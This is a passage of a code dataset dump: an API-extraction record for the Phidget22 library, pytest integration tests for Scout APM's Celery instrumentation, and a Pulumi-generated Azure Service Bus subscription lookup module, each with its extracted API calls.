'ctypes.byref', (['_HubPortSupportsSetSpeed'], {}), '(_HubPortSupportsSetSpeed)\\n', (13762, 13788), False, 'import ctypes\\n'), ((13817, 13841), 'Phidget22.PhidgetException.PhidgetException', 'PhidgetException', (['result'], {}), '(result)\\n', (13833, 13841), False, 'from Phidget22.PhidgetException import PhidgetException\\n'), ((13951, 13974), 'Phidget22.PhidgetSupport.PhidgetSupport.getDll', 'PhidgetSupport.getDll', ([], {}), '()\\n', (13972, 13974), False, 'from Phidget22.PhidgetSupport import PhidgetSupport\\n'), ((14061, 14085), 'ctypes.byref', 'ctypes.byref', (['_IsChannel'], {}), '(_IsChannel)\\n', (14073, 14085), False, 'import ctypes\\n'), ((14114, 14138), 'Phidget22.PhidgetException.PhidgetException', 'PhidgetException', (['result'], {}), '(result)\\n', (14130, 14138), False, 'from Phidget22.PhidgetException import PhidgetException\\n'), ((14246, 14269), 'Phidget22.PhidgetSupport.PhidgetSupport.getDll', 'PhidgetSupport.getDll', ([], {}), '()\\n', (14267, 14269), False, 'from Phidget22.PhidgetSupport import PhidgetSupport\\n'), ((14362, 14392), 'ctypes.byref', 'ctypes.byref', (['_IsHubPortDevice'], {}), '(_IsHubPortDevice)\\n', (14374, 14392), False, 'import ctypes\\n'), ((14421, 14445), 
'Phidget22.PhidgetException.PhidgetException', 'PhidgetException', (['result'], {}), '(result)\\n', (14437, 14445), False, 'from Phidget22.PhidgetException import PhidgetException\\n'), ((14591, 14614), 'Phidget22.PhidgetSupport.PhidgetSupport.getDll', 'PhidgetSupport.getDll', ([], {}), '()\\n', (14612, 14614), False, 'from Phidget22.PhidgetSupport import PhidgetSupport\\n'), ((14752, 14776), 'Phidget22.PhidgetException.PhidgetException', 'PhidgetException', (['result'], {}), '(result)\\n', (14768, 14776), False, 'from Phidget22.PhidgetException import PhidgetException\\n'), ((14842, 14865), 'Phidget22.PhidgetSupport.PhidgetSupport.getDll', 'PhidgetSupport.getDll', ([], {}), '()\\n', (14863, 14865), False, 'from Phidget22.PhidgetSupport import PhidgetSupport\\n'), ((14950, 14972), 'ctypes.byref', 'ctypes.byref', (['_IsLocal'], {}), '(_IsLocal)\\n', (14962, 14972), False, 'import ctypes\\n'), ((15001, 15025), 'Phidget22.PhidgetException.PhidgetException', 'PhidgetException', (['result'], {}), '(result)\\n', (15017, 15025), False, 'from Phidget22.PhidgetException import PhidgetException\\n'), ((15131, 15154), 'Phidget22.PhidgetSupport.PhidgetSupport.getDll', 'PhidgetSupport.getDll', ([], {}), '()\\n', (15152, 15154), False, 'from Phidget22.PhidgetSupport import PhidgetSupport\\n'), ((15276, 15300), 'Phidget22.PhidgetException.PhidgetException', 'PhidgetException', (['result'], {}), '(result)\\n', (15292, 15300), False, 'from Phidget22.PhidgetException import PhidgetException\\n'), ((15368, 15391), 'Phidget22.PhidgetSupport.PhidgetSupport.getDll', 'PhidgetSupport.getDll', ([], {}), '()\\n', (15389, 15391), False, 'from Phidget22.PhidgetSupport import PhidgetSupport\\n'), ((15477, 15500), 'ctypes.byref', 'ctypes.byref', (['_IsRemote'], {}), '(_IsRemote)\\n', (15489, 15500), False, 'import ctypes\\n'), ((15529, 15553), 'Phidget22.PhidgetException.PhidgetException', 'PhidgetException', (['result'], {}), '(result)\\n', (15545, 15553), False, 'from Phidget22.PhidgetException import PhidgetException\\n'), ((15664, 15687), 'Phidget22.PhidgetSupport.PhidgetSupport.getDll', 'PhidgetSupport.getDll', ([], {}), '()\\n', (15685, 15687), False, 'from Phidget22.PhidgetSupport import PhidgetSupport\\n'), ((15811, 15835), 'Phidget22.PhidgetException.PhidgetException', 'PhidgetException', (['result'], {}), '(result)\\n', (15827, 15835), False, 'from Phidget22.PhidgetException import PhidgetException\\n'), ((15866, 15889), 'Phidget22.PhidgetSupport.PhidgetSupport.getDll', 'PhidgetSupport.getDll', ([], {}), '()\\n', (15887, 15889), False, 'from Phidget22.PhidgetSupport import PhidgetSupport\\n'), ((15995, 16019), 'Phidget22.PhidgetException.PhidgetException', 'PhidgetException', (['result'], {}), '(result)\\n', (16011, 16019), False, 'from Phidget22.PhidgetException import PhidgetException\\n'), ((16115, 16138), 'Phidget22.PhidgetSupport.PhidgetSupport.getDll', 'PhidgetSupport.getDll', ([], {}), '()\\n', (16136, 16138), False, 'from Phidget22.PhidgetSupport import PhidgetSupport\\n'), ((16271, 16295), 'Phidget22.PhidgetException.PhidgetException', 'PhidgetException', (['result'], {}), '(result)\\n', (16287, 16295), False, 'from Phidget22.PhidgetException import PhidgetException\\n'), ((16362, 16385), 'Phidget22.PhidgetSupport.PhidgetSupport.getDll', 'PhidgetSupport.getDll', ([], {}), '()\\n', (16383, 16385), False, 'from Phidget22.PhidgetSupport import PhidgetSupport\\n'), ((16469, 16490), 'ctypes.byref', 'ctypes.byref', (['_Parent'], {}), '(_Parent)\\n', (16481, 16490), False, 'import ctypes\\n'), ((16519, 
16543), 'Phidget22.PhidgetException.PhidgetException', 'PhidgetException', (['result'], {}), '(result)\\n', (16535, 16543), False, 'from Phidget22.PhidgetException import PhidgetException\\n'), ((16695, 16718), 'Phidget22.PhidgetSupport.PhidgetSupport.getDll', 'PhidgetSupport.getDll', ([], {}), '()\\n', (16716, 16718), False, 'from Phidget22.PhidgetSupport import PhidgetSupport\\n'), ((16810, 16839), 'ctypes.byref', 'ctypes.byref', (['_ServerHostname'], {}), '(_ServerHostname)\\n', (16822, 16839), False, 'import ctypes\\n'), ((16868, 16892), 'Phidget22.PhidgetException.PhidgetException', 'PhidgetException', (['result'], {}), '(result)\\n', (16884, 16892), False, 'from Phidget22.PhidgetException import PhidgetException\\n'), ((17014, 17037), 'Phidget22.PhidgetSupport.PhidgetSupport.getDll', 'PhidgetSupport.getDll', ([], {}), '()\\n', (17035, 17037), False, 'from Phidget22.PhidgetSupport import PhidgetSupport\\n'), ((17125, 17150), 'ctypes.byref', 'ctypes.byref', (['_ServerName'], {}), '(_ServerName)\\n', (17137, 17150), False, 'import ctypes\\n'), ((17179, 17203), 'Phidget22.PhidgetException.PhidgetException', 'PhidgetException', (['result'], {}), '(result)\\n', (17195, 17203), False, 'from Phidget22.PhidgetException import PhidgetException\\n'), ((17371, 17394), 'Phidget22.PhidgetSupport.PhidgetSupport.getDll', 'PhidgetSupport.getDll', ([], {}), '()\\n', (17392, 17394), False, 'from Phidget22.PhidgetSupport import PhidgetSupport\\n'), ((17482, 17507), 'ctypes.byref', 'ctypes.byref', (['_ServerName'], {}), '(_ServerName)\\n', (17494, 17507), False, 'import ctypes\\n'), ((17536, 17560), 'Phidget22.PhidgetException.PhidgetException', 'PhidgetException', (['result'], {}), '(result)\\n', (17552, 17560), False, 'from Phidget22.PhidgetException import PhidgetException\\n'), ((17643, 17666), 'Phidget22.PhidgetSupport.PhidgetSupport.getDll', 'PhidgetSupport.getDll', ([], {}), '()\\n', (17664, 17666), False, 'from Phidget22.PhidgetSupport import PhidgetSupport\\n'), ((17758, 17787), 'ctypes.byref', 'ctypes.byref', (['_ServerPeerName'], {}), '(_ServerPeerName)\\n', (17770, 17787), False, 'import ctypes\\n'), ((17816, 17840), 'Phidget22.PhidgetException.PhidgetException', 'PhidgetException', (['result'], {}), '(result)\\n', (17832, 17840), False, 'from Phidget22.PhidgetException import PhidgetException\\n'), ((17974, 17997), 'Phidget22.PhidgetSupport.PhidgetSupport.getDll', 'PhidgetSupport.getDll', ([], {}), '()\\n', (17995, 17997), False, 'from Phidget22.PhidgetSupport import PhidgetSupport\\n'), ((18091, 18122), 'ctypes.byref', 'ctypes.byref', (['_ServerUniqueName'], {}), '(_ServerUniqueName)\\n', (18103, 18122), False, 'import ctypes\\n'), ((18151, 18175), 'Phidget22.PhidgetException.PhidgetException', 'PhidgetException', (['result'], {}), '(result)\\n', (18167, 18175), False, 'from Phidget22.PhidgetException import PhidgetException\\n'), ((18315, 18338), 'Phidget22.PhidgetSupport.PhidgetSupport.getDll', 'PhidgetSupport.getDll', ([], {}), '()\\n', (18336, 18338), False, 'from Phidget22.PhidgetSupport import PhidgetSupport\\n'), ((18434, 18467), 'ctypes.byref', 'ctypes.byref', (['_MaxVINTDeviceSpeed'], {}), '(_MaxVINTDeviceSpeed)\\n', (18446, 18467), False, 'import ctypes\\n'), ((18496, 18520), 'Phidget22.PhidgetException.PhidgetException', 'PhidgetException', (['result'], {}), '(result)\\n', (18512, 18520), False, 'from Phidget22.PhidgetException import PhidgetException\\n'), ((18659, 18682), 'Phidget22.PhidgetSupport.PhidgetSupport.getDll', 'PhidgetSupport.getDll', ([], {}), '()\\n', (18680, 
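The dump does not say how those offsets were computed; the sketch below shows one way comparable records could be produced with Python's standard ast module (assuming Python 3.8+ for end_col_offset and get_source_segment). Resolving each call to its fully qualified, imported name, as the extract_api cell does, would additionally require tracking the module's import bindings.

```python
import ast

def extract_calls(source: str):
    """Yield ((start, end), callee_text, arg_texts) for every call in `source`."""
    tree = ast.parse(source)
    # Map (lineno, col_offset) pairs to absolute character offsets, the same
    # kind of offsets used in the extract_api records above.
    line_starts = [0]
    for line in source.splitlines(keepends=True):
        line_starts.append(line_starts[-1] + len(line))

    def abs_pos(lineno: int, col: int) -> int:
        return line_starts[lineno - 1] + col

    for node in ast.walk(tree):
        if isinstance(node, ast.Call):
            span = (abs_pos(node.lineno, node.col_offset),
                    abs_pos(node.end_lineno, node.end_col_offset))
            callee = ast.get_source_segment(source, node.func)
            args = [ast.get_source_segment(source, a) for a in node.args]
            yield span, callee, args

for span, callee, args in extract_calls("value = ctypes.c_int32(65536)\n"):
    print(span, callee, args)   # (8, 29) ctypes.c_int32 ['65536']
```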
Row 792: integration tests for the Scout APM Celery instrumentation (scout_apm.celery). Unescaped, the row's code cell is the following pytest module:

```python
# coding=utf-8
from __future__ import absolute_import, division, print_function, unicode_literals

from contextlib import contextmanager

import celery
import pytest
from celery.signals import setup_logging

import scout_apm.celery
from scout_apm.api import Config

# http://docs.celeryproject.org/en/latest/userguide/testing.html#py-test
skip_unless_celery_4_plus = pytest.mark.skipif(
    celery.VERSION < (4, 0), reason="pytest fixtures added in Celery 4.0"
)


@setup_logging.connect
def do_nothing(**kwargs):
    # Just by connecting to this signal, we prevent Celery from setting up
    # logging - and stop it from interfering with global state
    # http://docs.celeryproject.org/en/v4.3.0/userguide/signals.html#setup-logging
    pass


@contextmanager
def app_with_scout(app=None, config=None):
    """
    Context manager that configures a Celery app with Scout installed.
    """
    if app is None:
        app = celery.Celery("tasks", broker="memory://")

    # Enable Scout by default in tests.
    if config is None:
        config = {"monitor": True}

    # Disable running the agent.
    config["core_agent_launch"] = False

    @app.task
    def hello():
        return "Hello World!"

    # Setup according to https://docs.scoutapm.com/#celery
    Config.set(**config)
    scout_apm.celery.install()

    try:
        yield app
    finally:
        scout_apm.celery.uninstall()
        # Reset Scout configuration.
        Config.reset_all()


def test_hello_eager(tracked_requests):
    with app_with_scout() as app:
        result = app.tasks["tests.integration.test_celery.hello"].apply()

    assert result.result == "Hello World!"
    assert len(tracked_requests) == 1
    tracked_request = tracked_requests[0]
    assert "task_id" in tracked_request.tags
    assert tracked_request.tags["is_eager"] is True
    assert tracked_request.tags["exchange"] == "unknown"
    assert tracked_request.tags["routing_key"] == "unknown"
    assert tracked_request.tags["queue"] == "unknown"
    assert tracked_request.active_spans == []
    assert len(tracked_request.complete_spans) == 1
    span = tracked_request.complete_spans[0]
    assert span.operation == "Job/tests.integration.test_celery.hello"


@skip_unless_celery_4_plus
def test_hello_worker(celery_app, celery_worker, tracked_requests):
    with app_with_scout(app=celery_app) as app:
        result = app.tasks["tests.integration.test_celery.hello"].delay().get()

    assert result == "Hello World!"
    assert len(tracked_requests) == 1
    tracked_request = tracked_requests[0]
    assert "task_id" in tracked_request.tags
    assert tracked_request.tags["is_eager"] is False
    assert tracked_request.tags["exchange"] == ""
    assert tracked_request.tags["routing_key"] == "celery"
    assert tracked_request.tags["queue"] == "unknown"
    assert (
        0.0 <= tracked_request.tags["queue_time"] < 60.0
    )  # Assume test took <60 seconds
    assert tracked_request.active_spans == []
    assert len(tracked_request.complete_spans) == 1
    span = tracked_request.complete_spans[0]
    assert span.operation == "Job/tests.integration.test_celery.hello"


@skip_unless_celery_4_plus
def test_hello_worker_header_preset(celery_app, celery_worker, tracked_requests):
    with app_with_scout(app=celery_app) as app:
        result = (
            app.tasks["tests.integration.test_celery.hello"]
            .apply_async(headers={"scout_task_start": "an evil string"})
            .get()
        )

    assert result == "Hello World!"
    assert len(tracked_requests) == 1
    tracked_request = tracked_requests[0]
    assert tracked_request.active_spans == []
    assert len(tracked_request.complete_spans) == 1
    span = tracked_request.complete_spans[0]
    assert span.operation == "Job/tests.integration.test_celery.hello"
    assert "queue_time" not in span.tags


@skip_unless_celery_4_plus
def test_hello_worker_chain(celery_app, celery_worker, tracked_requests):
    with app_with_scout(app=celery_app) as app:
        hello = app.tasks["tests.integration.test_celery.hello"]
        result = (hello.si() | hello.si()).apply_async().get()

    assert result == "Hello World!"
    assert len(tracked_requests) == 2
    assert [t.complete_spans[0].operation for t in tracked_requests] == [
        "Job/tests.integration.test_celery.hello",
        "Job/tests.integration.test_celery.hello",
    ]
    assert "parent_task_id" not in tracked_requests[0].tags
    first_task_id = tracked_requests[0].tags["task_id"]
    assert tracked_requests[1].tags["parent_task_id"] == first_task_id


def test_no_monitor(tracked_requests):
    # With an empty config, "monitor" defaults to False.
    with app_with_scout(config={}) as app:
        result = app.tasks["tests.integration.test_celery.hello"].apply()

    assert result.result == "Hello World!"
    assert tracked_requests == []
```

APIs used in this sample: scout_apm.api.Config.set, celery.Celery, scout_apm.api.Config.reset_all, pytest.mark.skipif. The extract_api cell again pairs each of those call sites with its character span, its arguments, and the import that provides it.
raise TypeError(\"Expected argument 'dead_lettering_on_message_expiration' to be a bool\")\n pulumi.set(__self__, \"dead_lettering_on_message_expiration\", dead_lettering_on_message_expiration)\n if default_message_time_to_live and not isinstance(default_message_time_to_live, str):\n raise TypeError(\"Expected argument 'default_message_time_to_live' to be a str\")\n pulumi.set(__self__, \"default_message_time_to_live\", default_message_time_to_live)\n if duplicate_detection_history_time_window and not isinstance(duplicate_detection_history_time_window, str):\n raise TypeError(\"Expected argument 'duplicate_detection_history_time_window' to be a str\")\n pulumi.set(__self__, \"duplicate_detection_history_time_window\", duplicate_detection_history_time_window)\n if enable_batched_operations and not isinstance(enable_batched_operations, bool):\n raise TypeError(\"Expected argument 'enable_batched_operations' to be a bool\")\n pulumi.set(__self__, \"enable_batched_operations\", enable_batched_operations)\n if forward_dead_lettered_messages_to and not isinstance(forward_dead_lettered_messages_to, str):\n raise TypeError(\"Expected argument 'forward_dead_lettered_messages_to' to be a str\")\n pulumi.set(__self__, \"forward_dead_lettered_messages_to\", forward_dead_lettered_messages_to)\n if forward_to and not isinstance(forward_to, str):\n raise TypeError(\"Expected argument 'forward_to' to be a str\")\n pulumi.set(__self__, \"forward_to\", forward_to)\n if id and not isinstance(id, str):\n raise TypeError(\"Expected argument 'id' to be a str\")\n pulumi.set(__self__, \"id\", id)\n if is_client_affine and not isinstance(is_client_affine, bool):\n raise TypeError(\"Expected argument 'is_client_affine' to be a bool\")\n pulumi.set(__self__, \"is_client_affine\", is_client_affine)\n if lock_duration and not isinstance(lock_duration, str):\n raise TypeError(\"Expected argument 'lock_duration' to be a str\")\n pulumi.set(__self__, \"lock_duration\", lock_duration)\n if max_delivery_count and not isinstance(max_delivery_count, int):\n raise TypeError(\"Expected argument 'max_delivery_count' to be a int\")\n pulumi.set(__self__, \"max_delivery_count\", max_delivery_count)\n if message_count and not isinstance(message_count, float):\n raise TypeError(\"Expected argument 'message_count' to be a float\")\n pulumi.set(__self__, \"message_count\", message_count)\n if name and not isinstance(name, str):\n raise TypeError(\"Expected argument 'name' to be a str\")\n pulumi.set(__self__, \"name\", name)\n if requires_session and not isinstance(requires_session, bool):\n raise TypeError(\"Expected argument 'requires_session' to be a bool\")\n pulumi.set(__self__, \"requires_session\", requires_session)\n if status and not isinstance(status, str):\n raise TypeError(\"Expected argument 'status' to be a str\")\n pulumi.set(__self__, \"status\", status)\n if system_data and not isinstance(system_data, dict):\n raise TypeError(\"Expected argument 'system_data' to be a dict\")\n pulumi.set(__self__, \"system_data\", system_data)\n if type and not isinstance(type, str):\n raise TypeError(\"Expected argument 'type' to be a str\")\n pulumi.set(__self__, \"type\", type)\n if updated_at and not isinstance(updated_at, str):\n raise TypeError(\"Expected argument 'updated_at' to be a str\")\n pulumi.set(__self__, \"updated_at\", updated_at)\n\n @property\n @pulumi.getter(name=\"accessedAt\")\n def accessed_at(self) -> str:\n \"\"\"\n Last time there was a receive request to this subscription.\n \"\"\"\n return 
pulumi.get(self, \"accessed_at\")\n\n @property\n @pulumi.getter(name=\"autoDeleteOnIdle\")\n def auto_delete_on_idle(self) -> Optional[str]:\n \"\"\"\n ISO 8061 timeSpan idle interval after which the topic is automatically deleted. The minimum duration is 5 minutes.\n \"\"\"\n return pulumi.get(self, \"auto_delete_on_idle\")\n\n @property\n @pulumi.getter(name=\"clientAffineProperties\")\n def client_affine_properties(self) -> Optional['outputs.SBClientAffinePropertiesResponse']:\n \"\"\"\n Properties specific to client affine subscriptions.\n \"\"\"\n return pulumi.get(self, \"client_affine_properties\")\n\n @property\n @pulumi.getter(name=\"countDetails\")\n def count_details(self) -> 'outputs.MessageCountDetailsResponse':\n \"\"\"\n Message count details\n \"\"\"\n return pulumi.get(self, \"count_details\")\n\n @property\n @pulumi.getter(name=\"createdAt\")\n def created_at(self) -> str:\n \"\"\"\n Exact time the message was created.\n \"\"\"\n return pulumi.get(self, \"created_at\")\n\n @property\n @pulumi.getter(name=\"deadLetteringOnFilterEvaluationExceptions\")\n def dead_lettering_on_filter_evaluation_exceptions(self) -> Optional[bool]:\n \"\"\"\n Value that indicates whether a subscription has dead letter support on filter evaluation exceptions.\n \"\"\"\n return pulumi.get(self, \"dead_lettering_on_filter_evaluation_exceptions\")\n\n @property\n @pulumi.getter(name=\"deadLetteringOnMessageExpiration\")\n def dead_lettering_on_message_expiration(self) -> Optional[bool]:\n \"\"\"\n Value that indicates whether a subscription has dead letter support when a message expires.\n \"\"\"\n return pulumi.get(self, \"dead_lettering_on_message_expiration\")\n\n @property\n @pulumi.getter(name=\"defaultMessageTimeToLive\")\n def default_message_time_to_live(self) -> Optional[str]:\n \"\"\"\n ISO 8061 Default message timespan to live value. This is the duration after which the message expires, starting from when the message is sent to Service Bus. This is the default value used when TimeToLive is not set on a message itself.\n \"\"\"\n return pulumi.get(self, \"default_message_time_to_live\")\n\n @property\n @pulumi.getter(name=\"duplicateDetectionHistoryTimeWindow\")\n def duplicate_detection_history_time_window(self) -> Optional[str]:\n \"\"\"\n ISO 8601 timeSpan structure that defines the duration of the duplicate detection history. 
The default value is 10 minutes.\n \"\"\"\n return pulumi.get(self, \"duplicate_detection_history_time_window\")\n\n @property\n @pulumi.getter(name=\"enableBatchedOperations\")\n def enable_batched_operations(self) -> Optional[bool]:\n \"\"\"\n Value that indicates whether server-side batched operations are enabled.\n \"\"\"\n return pulumi.get(self, \"enable_batched_operations\")\n\n @property\n @pulumi.getter(name=\"forwardDeadLetteredMessagesTo\")\n def forward_dead_lettered_messages_to(self) -> Optional[str]:\n \"\"\"\n Queue/Topic name to forward the Dead Letter message\n \"\"\"\n return pulumi.get(self, \"forward_dead_lettered_messages_to\")\n\n @property\n @pulumi.getter(name=\"forwardTo\")\n def forward_to(self) -> Optional[str]:\n \"\"\"\n Queue/Topic name to forward the messages\n \"\"\"\n return pulumi.get(self, \"forward_to\")\n\n @property\n @pulumi.getter\n def id(self) -> str:\n \"\"\"\n Resource Id\n \"\"\"\n return pulumi.get(self, \"id\")\n\n @property\n @pulumi.getter(name=\"isClientAffine\")\n def is_client_affine(self) -> Optional[bool]:\n \"\"\"\n Value that indicates whether the subscription has an affinity to the client id.\n \"\"\"\n return pulumi.get(self, \"is_client_affine\")\n\n @property\n @pulumi.getter(name=\"lockDuration\")\n def lock_duration(self) -> Optional[str]:\n \"\"\"\n ISO 8061 lock duration timespan for the subscription. The default value is 1 minute.\n \"\"\"\n return pulumi.get(self, \"lock_duration\")\n\n @property\n @pulumi.getter(name=\"maxDeliveryCount\")\n def max_delivery_count(self) -> Optional[int]:\n \"\"\"\n Number of maximum deliveries.\n \"\"\"\n return pulumi.get(self, \"max_delivery_count\")\n\n @property\n @pulumi.getter(name=\"messageCount\")\n def message_count(self) -> float:\n \"\"\"\n Number of messages.\n \"\"\"\n return pulumi.get(self, \"message_count\")\n\n @property\n @pulumi.getter\n def name(self) -> str:\n \"\"\"\n Resource name\n \"\"\"\n return pulumi.get(self, \"name\")\n\n @property\n @pulumi.getter(name=\"requiresSession\")\n def requires_session(self) -> Optional[bool]:\n \"\"\"\n Value indicating if a subscription supports the concept of sessions.\n \"\"\"\n return pulumi.get(self, \"requires_session\")\n\n @property\n @pulumi.getter\n def status(self) -> Optional[str]:\n \"\"\"\n Enumerates the possible values for the status of a messaging entity.\n \"\"\"\n return pulumi.get(self, \"status\")\n\n @property\n @pulumi.getter(name=\"systemData\")\n def system_data(self) -> 'outputs.SystemDataResponse':\n \"\"\"\n The system meta data relating to this resource.\n \"\"\"\n return pulumi.get(self, \"system_data\")\n\n @property\n @pulumi.getter\n def type(self) -> str:\n \"\"\"\n Resource type\n \"\"\"\n return pulumi.get(self, \"type\")\n\n @property\n @pulumi.getter(name=\"updatedAt\")\n def updated_at(self) -> str:\n \"\"\"\n The exact time the message was updated.\n \"\"\"\n return pulumi.get(self, \"updated_at\")\n\n\nclass AwaitableGetSubscriptionResult(GetSubscriptionResult):\n # pylint: disable=using-constant-test\n def __await__(self):\n if False:\n yield self\n return GetSubscriptionResult(\n accessed_at=self.accessed_at,\n auto_delete_on_idle=self.auto_delete_on_idle,\n client_affine_properties=self.client_affine_properties,\n count_details=self.count_details,\n created_at=self.created_at,\n dead_lettering_on_filter_evaluation_exceptions=self.dead_lettering_on_filter_evaluation_exceptions,\n dead_lettering_on_message_expiration=self.dead_lettering_on_message_expiration,\n 
default_message_time_to_live=self.default_message_time_to_live,\n duplicate_detection_history_time_window=self.duplicate_detection_history_time_window,\n enable_batched_operations=self.enable_batched_operations,\n forward_dead_lettered_messages_to=self.forward_dead_lettered_messages_to,\n forward_to=self.forward_to,\n id=self.id,\n is_client_affine=self.is_client_affine,\n lock_duration=self.lock_duration,\n max_delivery_count=self.max_delivery_count,\n message_count=self.message_count,\n name=self.name,\n requires_session=self.requires_session,\n status=self.status,\n system_data=self.system_data,\n type=self.type,\n updated_at=self.updated_at)\n\n\ndef get_subscription(namespace_name: Optional[str] = None,\n resource_group_name: Optional[str] = None,\n subscription_name: Optional[str] = None,\n topic_name: Optional[str] = None,\n opts: Optional[pulumi.InvokeOptions] = None) -> AwaitableGetSubscriptionResult:\n \"\"\"\n Description of subscription resource.\n\n\n :param str namespace_name: The namespace name\n :param str resource_group_name: Name of the Resource group within the Azure subscription.\n :param str subscription_name: The subscription name.\n :param str topic_name: The topic name.\n \"\"\"\n __args__ = dict()\n __args__['namespaceName'] = namespace_name\n __args__['resourceGroupName'] = resource_group_name\n __args__['subscriptionName'] = subscription_name\n __args__['topicName'] = topic_name\n if opts is None:\n opts = pulumi.InvokeOptions()\n if opts.version is None:\n opts.version = _utilities.get_version()\n __ret__ = pulumi.runtime.invoke('azure-native:servicebus/v20210601preview:getSubscription', __args__, opts=opts, typ=GetSubscriptionResult).value\n\n return AwaitableGetSubscriptionResult(\n accessed_at=__ret__.accessed_at,\n auto_delete_on_idle=__ret__.auto_delete_on_idle,\n client_affine_properties=__ret__.client_affine_properties,\n count_details=__ret__.count_details,\n created_at=__ret__.created_at,\n dead_lettering_on_filter_evaluation_exceptions=__ret__.dead_lettering_on_filter_evaluation_exceptions,\n dead_lettering_on_message_expiration=__ret__.dead_lettering_on_message_expiration,\n default_message_time_to_live=__ret__.default_message_time_to_live,\n duplicate_detection_history_time_window=__ret__.duplicate_detection_history_time_window,\n enable_batched_operations=__ret__.enable_batched_operations,\n forward_dead_lettered_messages_to=__ret__.forward_dead_lettered_messages_to,\n forward_to=__ret__.forward_to,\n id=__ret__.id,\n is_client_affine=__ret__.is_client_affine,\n lock_duration=__ret__.lock_duration,\n max_delivery_count=__ret__.max_delivery_count,\n message_count=__ret__.message_count,\n name=__ret__.name,\n requires_session=__ret__.requires_session,\n status=__ret__.status,\n system_data=__ret__.system_data,\n type=__ret__.type,\n updated_at=__ret__.updated_at)\n"},"apis":{"kind":"list like","value":["pulumi.get","pulumi.getter","pulumi.set","pulumi.InvokeOptions","pulumi.runtime.invoke"],"string":"[\n \"pulumi.get\",\n \"pulumi.getter\",\n \"pulumi.set\",\n \"pulumi.InvokeOptions\",\n \"pulumi.runtime.invoke\"\n]"},"extract_api":{"kind":"string","value":"[((6398, 6430), 'pulumi.getter', 'pulumi.getter', ([], {'name': '\"\"\"accessedAt\"\"\"'}), \"(name='accessedAt')\\n\", (6411, 6430), False, 'import pulumi\\n'), ((6624, 6662), 'pulumi.getter', 'pulumi.getter', ([], {'name': '\"\"\"autoDeleteOnIdle\"\"\"'}), \"(name='autoDeleteOnIdle')\\n\", (6637, 6662), False, 'import pulumi\\n'), ((6937, 6981), 'pulumi.getter', 'pulumi.getter', ([], {'name': 
'\"\"\"clientAffineProperties\"\"\"'}), \"(name='clientAffineProperties')\\n\", (6950, 6981), False, 'import pulumi\\n'), ((7242, 7276), 'pulumi.getter', 'pulumi.getter', ([], {'name': '\"\"\"countDetails\"\"\"'}), \"(name='countDetails')\\n\", (7255, 7276), False, 'import pulumi\\n'), ((7470, 7501), 'pulumi.getter', 'pulumi.getter', ([], {'name': '\"\"\"createdAt\"\"\"'}), \"(name='createdAt')\\n\", (7483, 7501), False, 'import pulumi\\n'), ((7669, 7732), 'pulumi.getter', 'pulumi.getter', ([], {'name': '\"\"\"deadLetteringOnFilterEvaluationExceptions\"\"\"'}), \"(name='deadLetteringOnFilterEvaluationExceptions')\\n\", (7682, 7732), False, 'import pulumi\\n'), ((8048, 8102), 'pulumi.getter', 'pulumi.getter', ([], {'name': '\"\"\"deadLetteringOnMessageExpiration\"\"\"'}), \"(name='deadLetteringOnMessageExpiration')\\n\", (8061, 8102), False, 'import pulumi\\n'), ((8389, 8435), 'pulumi.getter', 'pulumi.getter', ([], {'name': '\"\"\"defaultMessageTimeToLive\"\"\"'}), \"(name='defaultMessageTimeToLive')\\n\", (8402, 8435), False, 'import pulumi\\n'), ((8850, 8907), 'pulumi.getter', 'pulumi.getter', ([], {'name': '\"\"\"duplicateDetectionHistoryTimeWindow\"\"\"'}), \"(name='duplicateDetectionHistoryTimeWindow')\\n\", (8863, 8907), False, 'import pulumi\\n'), ((9230, 9275), 'pulumi.getter', 'pulumi.getter', ([], {'name': '\"\"\"enableBatchedOperations\"\"\"'}), \"(name='enableBatchedOperations')\\n\", (9243, 9275), False, 'import pulumi\\n'), ((9521, 9572), 'pulumi.getter', 'pulumi.getter', ([], {'name': '\"\"\"forwardDeadLetteredMessagesTo\"\"\"'}), \"(name='forwardDeadLetteredMessagesTo')\\n\", (9534, 9572), False, 'import pulumi\\n'), ((9812, 9843), 'pulumi.getter', 'pulumi.getter', ([], {'name': '\"\"\"forwardTo\"\"\"'}), \"(name='forwardTo')\\n\", (9825, 9843), False, 'import pulumi\\n'), ((10167, 10203), 'pulumi.getter', 'pulumi.getter', ([], {'name': '\"\"\"isClientAffine\"\"\"'}), \"(name='isClientAffine')\\n\", (10180, 10203), False, 'import pulumi\\n'), ((10438, 10472), 'pulumi.getter', 'pulumi.getter', ([], {'name': '\"\"\"lockDuration\"\"\"'}), \"(name='lockDuration')\\n\", (10451, 10472), False, 'import pulumi\\n'), ((10705, 10743), 'pulumi.getter', 'pulumi.getter', ([], {'name': '\"\"\"maxDeliveryCount\"\"\"'}), \"(name='maxDeliveryCount')\\n\", (10718, 10743), False, 'import pulumi\\n'), ((10931, 10965), 'pulumi.getter', 'pulumi.getter', ([], {'name': '\"\"\"messageCount\"\"\"'}), \"(name='messageCount')\\n\", (10944, 10965), False, 'import pulumi\\n'), ((11272, 11309), 'pulumi.getter', 'pulumi.getter', ([], {'name': '\"\"\"requiresSession\"\"\"'}), \"(name='requiresSession')\\n\", (11285, 11309), False, 'import pulumi\\n'), ((11749, 11781), 'pulumi.getter', 'pulumi.getter', ([], {'name': '\"\"\"systemData\"\"\"'}), \"(name='systemData')\\n\", (11762, 11781), False, 'import pulumi\\n'), ((12135, 12166), 'pulumi.getter', 'pulumi.getter', ([], {'name': '\"\"\"updatedAt\"\"\"'}), \"(name='updatedAt')\\n\", (12148, 12166), False, 'import pulumi\\n'), ((1293, 1341), 'pulumi.set', 'pulumi.set', (['__self__', '\"\"\"accessed_at\"\"\"', 'accessed_at'], {}), \"(__self__, 'accessed_at', accessed_at)\\n\", (1303, 1341), False, 'import pulumi\\n'), ((1510, 1574), 'pulumi.set', 'pulumi.set', (['__self__', '\"\"\"auto_delete_on_idle\"\"\"', 'auto_delete_on_idle'], {}), \"(__self__, 'auto_delete_on_idle', auto_delete_on_idle)\\n\", (1520, 1574), False, 'import pulumi\\n'), ((1760, 1834), 'pulumi.set', 'pulumi.set', (['__self__', '\"\"\"client_affine_properties\"\"\"', 
